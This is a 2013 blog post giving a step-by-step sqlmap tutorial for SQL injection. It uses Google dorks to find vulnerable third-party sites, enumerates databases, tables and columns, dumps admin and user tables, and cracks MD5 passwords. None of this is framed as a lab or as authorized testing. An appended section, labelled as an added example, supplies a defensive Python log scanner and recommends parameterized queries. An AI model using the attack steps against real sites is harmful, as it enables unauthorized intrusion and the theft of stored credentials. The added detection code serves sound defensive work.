Saturday, April 13, 2013

SQL Injection using SQLMAP

1. Still use Google dorks to find the targets




2. Use Google dorks like this,


ex,
inurl:prod_detail.php?id=


You can combine them like this to look within a specific domain,


inurl:prod_detail.php?id= site:.mn




3. Pick your target


4. Add a ' character to the end of the link


ex,


http://yourtarget.com/read.php?id=359237'  <--- see this ' char? Put it at the end of the URL


5. Run sqlmap,


sqlmap -u http://yourtarget.com/read.php?id=359237 --dbs


6. Wait until you find the database name


ex,


[23:15:26] [INFO] falling back to current database
[23:15:26] [INFO] fetching current database
available databases [1]:
[*] ctrekker   <----- DB name


7. Find the database tables,


sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker --tables


8. Find some interesting tables, usually 'admin', 'administrator' or 'users'. It can be anything.


9. Find the columns of those interesting tables


ex,


sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker -T tablesname --columns


10. Dump the columns


ex,


sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker -T tablesname -C columnname --dump


11. Party!!! You can crack some MD5 passwords using password-cracking tools or a website


ex,



John the Ripper
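
Seen from the server side, steps 4 to 10 leave a clear trail in the web access log: the id parameter stops being a plain number, and sqlmap names itself in the User-Agent header by default. The following is an added example, not part of the original post: a Python log scanner that counts both signals per client IP. The log lines, IP addresses, the scan function and the choice of id as a numeric-only parameter are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Apr/2013:23:14:02 +0000] "GET /read.php?id=359237 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Apr/2013:23:14:09 +0000] "GET /read.php?id=359237' HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Apr/2013:23:15:26 +0000] "GET /read.php?id=359237%27 HTTP/1.1" 200 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [13/Apr/2013:23:15:27 +0000] "GET /read.php?id=359237 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.4 - - [13/Apr/2013:23:16:00 +0000] "GET /read.php?id=42 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

# ip, identity, user, [time], "METHOD target PROTO", status, size, "referer", "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def scan(log_text, numeric_params=("id",)):
    """Return {client_ip: {"bad_param": n, "sqlmap_ua": n}} for suspicious requests.

    numeric_params lists query parameters the application expects to be
    plain integers (an assumption about the site being monitored).
    """
    hits = defaultdict(lambda: {"bad_param": 0, "sqlmap_ua": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        # parse_qs percent-decodes, so %27 and a literal ' are treated alike.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        values = [v for p in numeric_params for v in query.get(p, [])]
        if any(re.fullmatch(r"[0-9]+", v) is None for v in values):
            hits[m["ip"]]["bad_param"] += 1
        if "sqlmap" in m["ua"].lower():
            hits[m["ip"]]["sqlmap_ua"] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}


if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, counts)
```

The User-Agent match is a weak signal because the header is set by the client; the non-numeric id check is the more reliable of the two. Neither replaces the actual fix, which is a parameterized query behind read.php.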
